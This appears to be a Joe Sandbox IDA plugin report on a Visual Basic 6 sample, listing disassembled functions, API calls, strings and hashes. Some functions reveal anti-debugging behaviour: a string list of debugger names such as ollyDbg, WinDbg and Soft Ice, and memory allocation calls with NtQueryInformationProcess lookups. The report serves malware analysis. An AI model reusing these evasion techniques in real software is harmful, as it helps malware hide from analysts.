Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ChkstkFreeMove$List$#644AddressAnsiErrorHandleModuleProcSystem
String ID:
API String ID: 1084042792-0
Opcode ID: cc2a8aa4748b8dca2cfd4d9f34ecb9c4e1b35a3afcf6c34f7ed8b7b8864a6561
Instruction ID: 9d38cc2ca50dd174c24a639c31348b4a5c1f02d4dbf976ecda8e982e0c0775e9
Opcode Fuzzy Hash: cc2a8aa4748b8dca2cfd4d9f34ecb9c4e1b35a3afcf6c34f7ed8b7b8864a6561
Instruction Fuzzy Hash: 1001ED71804208ABCB00EFE5D94BFCDBFB8FF48744F508466F404AB262D775AA049B95

Function 005C54EB Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C5507

Part of subcall function 005C7404: __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,005C553A,?,?,?,?,00401526), ref: 005C741F
Part of subcall function 005C7404: __vbaNew2.MSVBVM60(0040839C,005C9300,?,?,?,00000000,00401526,?,?,?,005C553A), ref: 005C744E
Part of subcall function 005C7404: __vbaChkstk.MSVBVM60 ref: 005C748A
Part of subcall function 005C7404: __vbaChkstk.MSVBVM60 ref: 005C749B
Part of subcall function 005C7404: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B5C4,000002B0), ref: 005C74D2
Part of subcall function 005C7404: __vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C74F3
Part of subcall function 005C7404: __vbaNew2.MSVBVM60(0040839C,005C9300), ref: 005C7523
Part of subcall function 005C7404: __vbaObjSetAddref.MSVBVM60(?,?), ref: 005C7541

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Chkstk$New2$AddrefCheckHresult
String ID:
API String ID: 1889392896-0
Opcode ID: 7a3662d7ac2d259d3bab7adf219b3faf752365e48d0f2bf5c0c82855049e8e52
Instruction ID: 52bd1f6ccf9741527c0dcc8a68ca2579c258335835e1ef9704ea5c3140b3a5bc
Opcode Fuzzy Hash: 7a3662d7ac2d259d3bab7adf219b3faf752365e48d0f2bf5c0c82855049e8e52
Instruction Fuzzy Hash: 610116B2A00648EFCB01DF58D946B8DBFB4FB45740F10846AF8099B262D338AA40CB95

Function 005C732C Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2B6,?,?,?,?,?,00401526), ref: 005C7347

Part of subcall function 0054AA9F: NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess), ref: 0054AB36

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: AllocateChkstkMemoryVirtual__vba
String ID:
API String ID: 3513745053-0
Opcode ID: d3b99f7ad3e6096f9accf6d527ca79fa98a0bcc638b55834b5a4a1af462c1307
Instruction ID: 0eee817b2e13f813bcddde360cc419012536c81f810b8dd82a2ddb785c1320f7
Opcode Fuzzy Hash: d3b99f7ad3e6096f9accf6d527ca79fa98a0bcc638b55834b5a4a1af462c1307
Instruction Fuzzy Hash: 12D0C2B1490788BEC2009B868D07F5EBEACF749F44F10081EF001676D0D2B86900956A

Non-executed Functions

Function 0054ACFA Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

NtQueryInformationProcess, xrefs: 0054AD19, 0054AD3A

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID: NtQueryInformationProcess
API String ID: 0-2781105232
Opcode ID: d68e2f914ae852ca0d680da02795a2dacfd7c268fcf049671a1f24f741c7abf0
Instruction ID: e3107e904df1ba66677652666e8e4b38ce91503cbac552bcbe260d2d7eb132dc
Opcode Fuzzy Hash: d68e2f914ae852ca0d680da02795a2dacfd7c268fcf049671a1f24f741c7abf0
Instruction Fuzzy Hash: 20F0A030FD4111AEDAA06A24CC4EFA62F94BB44B5EF60D861F44AEA9A2D664DC009103

Function 0054B055 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
Instruction ID: 2aea7a4f82491d4c6a733bf6f1f3d9c33c55ac2891d59de2e93f290f71fea994
Opcode Fuzzy Hash: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
Instruction Fuzzy Hash: DE01D132604106CBEB30AB18C04C9EBBBA2FB7136AF950422D92D47B10D322EA84C602

Function 022A3376 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
Instruction ID: d6a2856037c5c2d27f7496a81703d06248cee415ff28095efdbdd62383931441
Opcode Fuzzy Hash: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
Instruction Fuzzy Hash: 17F039326385109FCB20DB99D450A6AB3E9EBC07707154899E4899BE04CB31FC808AD0

Function 0054AD6C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
Instruction ID: 95dff2fb833417202495218693bf5b1a421dd4471ca0001524ddc04ad995461f
Opcode Fuzzy Hash: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
Instruction Fuzzy Hash: 46B0123F0716C44DDB13CF3442137E93B6593004C0F5404C1D0C04B66BC00C8687D556

Function 0054AD80 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
Instruction ID: 75d8ee55a9432d655d400c20f764b696a43bdfdc0ccd3be24d65f6ea96f8add4
Opcode Fuzzy Hash: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
Instruction Fuzzy Hash: 0CB012241015C18EC9024F1041127A877A0D7019C0F0A00C494C04B513C11C8645A610

Function 022A6CEC Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8207d9338d48eaa58bcf894091f273c5f1ba2291a3dcab0922542a31be3f470
Instruction ID: 60e63de5957a7f3aeb45ddbd144c15dbf272bc1d6ba1101bf083e3e75a9a2faf
Opcode Fuzzy Hash: a8207d9338d48eaa58bcf894091f273c5f1ba2291a3dcab0922542a31be3f470
Instruction Fuzzy Hash: 5AB09230139580CFC2428B59C264A6073B8F704700F4500F1E4068FE16C7649900CA04

Function 022A707B Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f359a15aac9bef16dcbf83513692feeeafd97e242589ab4c61242ee1ba63dd7
Instruction ID: ee6421c3e0f9259548521485bdc7f11415b788ce3c3e13c3d828d4159024246d
Opcode Fuzzy Hash: 0f359a15aac9bef16dcbf83513692feeeafd97e242589ab4c61242ee1ba63dd7
Instruction Fuzzy Hash: E1B00235179540CFC2569B45D594A5473B8F744741F4554E1E4055BA558264AE40CA05

Function 022A6C8B Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa5735e108945feb1cebb53304a7166d55ff265eb412e5f8c8853dcbd5da360
Instruction ID: 39d0f3623eda289cf508d0a152de483eeabff0fbdc6ae6db4e255b003425720a
Opcode Fuzzy Hash: 1aa5735e108945feb1cebb53304a7166d55ff265eb412e5f8c8853dcbd5da360
Instruction Fuzzy Hash: F3B00135266980CFD296DB0AC294F6073F8FB04A41F4A64F0E4498BA62C738A901CA40

Function 022A7109 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bac31205334e0f9ffc6cdac357d75172e52d2a21de088034a7fa3c621bcab9d
Instruction ID: b80a7974f19584570e9af62b94816b8d0283ee71a2bc7a9517126b21d8e92f41
Opcode Fuzzy Hash: 5bac31205334e0f9ffc6cdac357d75172e52d2a21de088034a7fa3c621bcab9d
Instruction Fuzzy Hash: 53B00135266980CFC296CB0AC198F5073B8FB04B41F4614F1E4059BA62C338AD00CA00

Function 022A6F52 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffa6fee49b029f388ee73941731a714f6e7632120a45cd52975d1a5ab74826e
Instruction ID: d535b6adde154685a07659a06dc348d53ef730e932a4fbefb0bcfc4142d63306
Opcode Fuzzy Hash: dffa6fee49b029f388ee73941731a714f6e7632120a45cd52975d1a5ab74826e
Instruction Fuzzy Hash: AFB00135266A80CFD296DB0AC194F5173F8FB04A41F4654F0E4458BA62C738A900CE40

Function 0054E6B4 Relevance: 114.1, APIs: 58, Strings: 7, Instructions: 381COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054E6D1
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,0000000B,00000000,?,?,?,?,00401526), ref: 0054E6F9
__vbaVarCopy.MSVBVM60 ref: 0054E734
__vbaStrCat.MSVBVM60(0040AF68,0040B0A8), ref: 0054E743
__vbaStrMove.MSVBVM60(0040AF68,0040B0A8), ref: 0054E74D
__vbaStrCat.MSVBVM60(0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E758
__vbaStrMove.MSVBVM60(0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E762
__vbaStrCat.MSVBVM60(0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E76D
__vbaStrMove.MSVBVM60(0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E777
__vbaStrCat.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E782
__vbaStrMove.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E78C
__vbaStrCat.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E797
__vbaVarZero.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7CC
__vbaStrCat.MSVBVM60(0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7DB
__vbaStrMove.MSVBVM60(0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7E5
__vbaStrCat.MSVBVM60(0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7F0
__vbaStrMove.MSVBVM60(0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7FA
__vbaStrCat.MSVBVM60(0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E805
__vbaStrMove.MSVBVM60(0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E80F
__vbaStrCat.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000), ref: 0054E81A
__vbaStrMove.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000), ref: 0054E824
__vbaStrCat.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000), ref: 0054E82F
__vbaVarZero.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000), ref: 0054E864
#698.MSVBVM60(?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E86F
#698.MSVBVM60(?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000), ref: 0054E87A
#698.MSVBVM60(?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8), ref: 0054E888
__vbaVarCat.MSVBVM60(?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804), ref: 0054E899
__vbaVarCat.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E8AD
__vbaVarZero.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E8CE
__vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E907
__vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E940
__vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E979
__vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E9B2
__vbaStrCat.MSVBVM60(0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000), ref: 0054E9C1
__vbaStrMove.MSVBVM60(0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000), ref: 0054E9CB
__vbaStrCat.MSVBVM60(0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E9D6
__vbaStrMove.MSVBVM60(0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E9E0
__vbaStrCat.MSVBVM60(0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E9EB
__vbaStrMove.MSVBVM60(0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E9F5
__vbaStrCat.MSVBVM60(0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041), ref: 0054EA00
__vbaStrMove.MSVBVM60(0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041), ref: 0054EA0A
__vbaStrCat.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EA15
__vbaVarZero.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EA4A
__vbaVarCopy.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EA83
__vbaVarCopy.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EABC
__vbaVarCopy.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EAF5
#601.MSVBVM60(?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?), ref: 0054EB08
__vbaErase.MSVBVM60(00000000,?,?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?), ref: 0054EB16
__vbaAryVar.MSVBVM60(0000200C,?,00000000,?,?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138), ref: 0054EB27
__vbaAryCopy.MSVBVM60(?,?,0000200C,?,00000000,?,?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000), ref: 0054EB3D
__vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000200C), ref: 0054EB74
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0054EB98
__vbaStrVarVal.MSVBVM60(?,?), ref: 0054EBEF
#644.MSVBVM60(00000000,?,?), ref: 0054EBF5
#644.MSVBVM60(00000000,00000000,?,?), ref: 0054EC02
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054EC19
__vbaFreeStr.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054EC36
__vbaAryDestruct.MSVBVM60(00000000,?,0054ECEF), ref: 0054ECE9

Strings

Rock Debugger, xrefs: 0054EAC1
WindDbg, xrefs: 0054E8D3
WinDbgFrameClass, xrefs: 0054E90C
ObsidianGUI, xrefs: 0054E945
Zeta Debugger, xrefs: 0054EA88
Soft Ice, xrefs: 0054E97E
ollyDbg, xrefs: 0054E701

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Move$Copy$Zero$#698Free$#644List$#601ChkstkDestructEraseErrorRedimSystem
String ID: ObsidianGUI$Rock Debugger$Soft Ice$WinDbgFrameClass$WindDbg$Zeta Debugger$ollyDbg
API String ID: 965276749-533602695
Opcode ID: 535461d0d3dba66fe792f3f28f53d9799e21b43aaef16f86d1ec65e962ba0c62
Instruction ID: 76f99efeba4eef2d943f50b1dde0d10957f91cbeb16511204edbb9c0a1b0b59e
Opcode Fuzzy Hash: 535461d0d3dba66fe792f3f28f53d9799e21b43aaef16f86d1ec65e962ba0c62
Instruction Fuzzy Hash: E0F121719002189BDB15DFA4CC85FEE73B8BF44344F1085AAF506BB291DB749A84CF59

Function 005C581C Relevance: 98.4, APIs: 49, Strings: 7, Instructions: 372COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C583A
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C587B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C58C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000058), ref: 005C5909
__vbaChkstk.MSVBVM60(00000000,?,0040BE80,00000058), ref: 005C592E
#689.MSVBVM60(?,Options,Show Tips at Startup), ref: 005C5949
__vbaStrMove.MSVBVM60(?,Options,Show Tips at Startup), ref: 005C5953
__vbaI4Str.MSVBVM60(00000000,?,Options,Show Tips at Startup), ref: 005C5959
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,Options,Show Tips at Startup), ref: 005C596B
__vbaFreeObj.MSVBVM60(?,?,00401526), ref: 005C5976
__vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C5998
__vbaObjSetAddref.MSVBVM60(?,00401418), ref: 005C59C5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C59EE
__vbaFreeObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C5A05

Strings

file was not found? , xrefs: 005C5C27
That the , xrefs: 005C5C0D
Options, xrefs: 005C5941
Create a text file named , xrefs: 005C5C66
Show Tips at Startup, xrefs: 005C593C
Then place it in the same directory as the application. , xrefs: 005C5CA5
using NotePad with 1 tip per line. , xrefs: 005C5C90

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2$#689AddrefListMove
String ID: file was not found? $ using NotePad with 1 tip per line. $Create a text file named $Options$Show Tips at Startup$That the $Then place it in the same directory as the application.
API String ID: 481385995-1258388981
Opcode ID: 0d3bdb3a3ddaa093caad53cdc2934e9cd2f05657764948c2873f6b3a6cee12d5
Instruction ID: 433c5d48ff34c4ad0d4b968faacfe28cd4f0da8129ffc6d96821f5ce2143a711
Opcode Fuzzy Hash: 0d3bdb3a3ddaa093caad53cdc2934e9cd2f05657764948c2873f6b3a6cee12d5
